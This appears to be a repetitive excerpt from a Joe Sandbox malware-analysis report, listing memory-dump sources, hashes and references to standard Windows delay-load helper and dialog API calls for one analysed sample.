                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 27da4139c95eee90ea48259bca65472ea65e416b999f0140983104ddaff8312f
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 27da4139c95eee90ea48259bca65472ea65e416b999f0140983104ddaff8312f
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 9758abd00dbe907be583ad80c1d4bc569505a28b18d8f6d1dcbb6d29c724186f
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 9758abd00dbe907be583ad80c1d4bc569505a28b18d8f6d1dcbb6d29c724186f
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 48491e77235640a454b788b7a9b26417924b5be52714ed18044929402445f89e
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 48491e77235640a454b788b7a9b26417924b5be52714ed18044929402445f89e
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f330d5310b3218f8d6dbb787d2641ecf7d89d71bba88b7645ab4480de839191f
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: f330d5310b3218f8d6dbb787d2641ecf7d89d71bba88b7645ab4480de839191f
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ece1b2d6b5e0d8bbf6372fc58b9d9f9daef603e78f88f0a3a8396b9e4457d453
                                                                                                                                                      • Instruction ID: 0939ebdf74b678cadc663b631ca3cd6a948cd43a8033c9d10f194bea5fbc448e
                                                                                                                                                      • Opcode Fuzzy Hash: ece1b2d6b5e0d8bbf6372fc58b9d9f9daef603e78f88f0a3a8396b9e4457d453
                                                                                                                                                      • Instruction Fuzzy Hash: E2A001AA2AD221BC71086266AE17E7B122DE9D9F25331AA1AF401D508AA890598A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: bff03fef8e26b907dfb3a94bb0214e199fdb6386651b3a5d32cb651aa337046f
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: bff03fef8e26b907dfb3a94bb0214e199fdb6386651b3a5d32cb651aa337046f
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f6987ce8f8089e16740f21caa0e678c595cfd59ac4c81cd00f5821f37a5dc32b
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: f6987ce8f8089e16740f21caa0e678c595cfd59ac4c81cd00f5821f37a5dc32b
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 5b69933f11ce3ce3d3ad38b72ecff7b663d909833c2123c5e08e477074d3170b
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: 5b69933f11ce3ce3d3ad38b72ecff7b663d909833c2123c5e08e477074d3170b
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c32e144ca2b46fcc8f979f30444c8600834b4447fc79f9ed80cad29a77ba9c53
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: c32e144ca2b46fcc8f979f30444c8600834b4447fc79f9ed80cad29a77ba9c53
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 1169ba1dfe4a31a17bc9211692136757af537ad6fb6f59a8c2f347799f3d81b3
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 1169ba1dfe4a31a17bc9211692136757af537ad6fb6f59a8c2f347799f3d81b3
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 8077fe8f3d823c08cbda8a57054b9635bbac17ce2877715727d7e9b16bc60a65
                                                                                                                                                      • Instruction ID: 86176bdf8e26660c5a53e93f72a003ddd3d2aed40e3e314265c1f0c4ea19dbe0
                                                                                                                                                      • Opcode Fuzzy Hash: 8077fe8f3d823c08cbda8a57054b9635bbac17ce2877715727d7e9b16bc60a65
                                                                                                                                                      • Instruction Fuzzy Hash: 19A001AE2AE512BD318862616F56E7A022DE5D9F253358A1AF401D5082A98118891071
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 4579dde20e54faae743afb2117905a92e4724d56d39b24b6c2c44f8bbed8bc11
                                                                                                                                                      • Instruction ID: 8b18ec4610fae345d2bb180b379847e80188a24e5d889ad39b9e01fee590d7ba
                                                                                                                                                      • Opcode Fuzzy Hash: 4579dde20e54faae743afb2117905a92e4724d56d39b24b6c2c44f8bbed8bc11
                                                                                                                                                      • Instruction Fuzzy Hash: BEA001AE2AE512BC318862616E56E7A022DE5D9F653358A1AF402C5082A98118891031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 122a8c005cd15e48e352fc7389f3be697243bfcec5fde9e35177ecd586894ad1
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 122a8c005cd15e48e352fc7389f3be697243bfcec5fde9e35177ecd586894ad1
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 06b42ca37dd3e640cb5eb21bf965459fd7d41d08e59c62a83cbf255603e7417c
• Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
• Opcode Fuzzy Hash: 06b42ca37dd3e640cb5eb21bf965459fd7d41d08e59c62a83cbf255603e7417c
• Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 2fab141b326dbacceea8a4689656db88c6999d21b29b7f9d5b1841feeeae1e7e
• Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
• Opcode Fuzzy Hash: 2fab141b326dbacceea8a4689656db88c6999d21b29b7f9d5b1841feeeae1e7e
• Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
APIs
• SetDlgItemTextW.USER32(?,?,?), ref: 00A21DFC
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
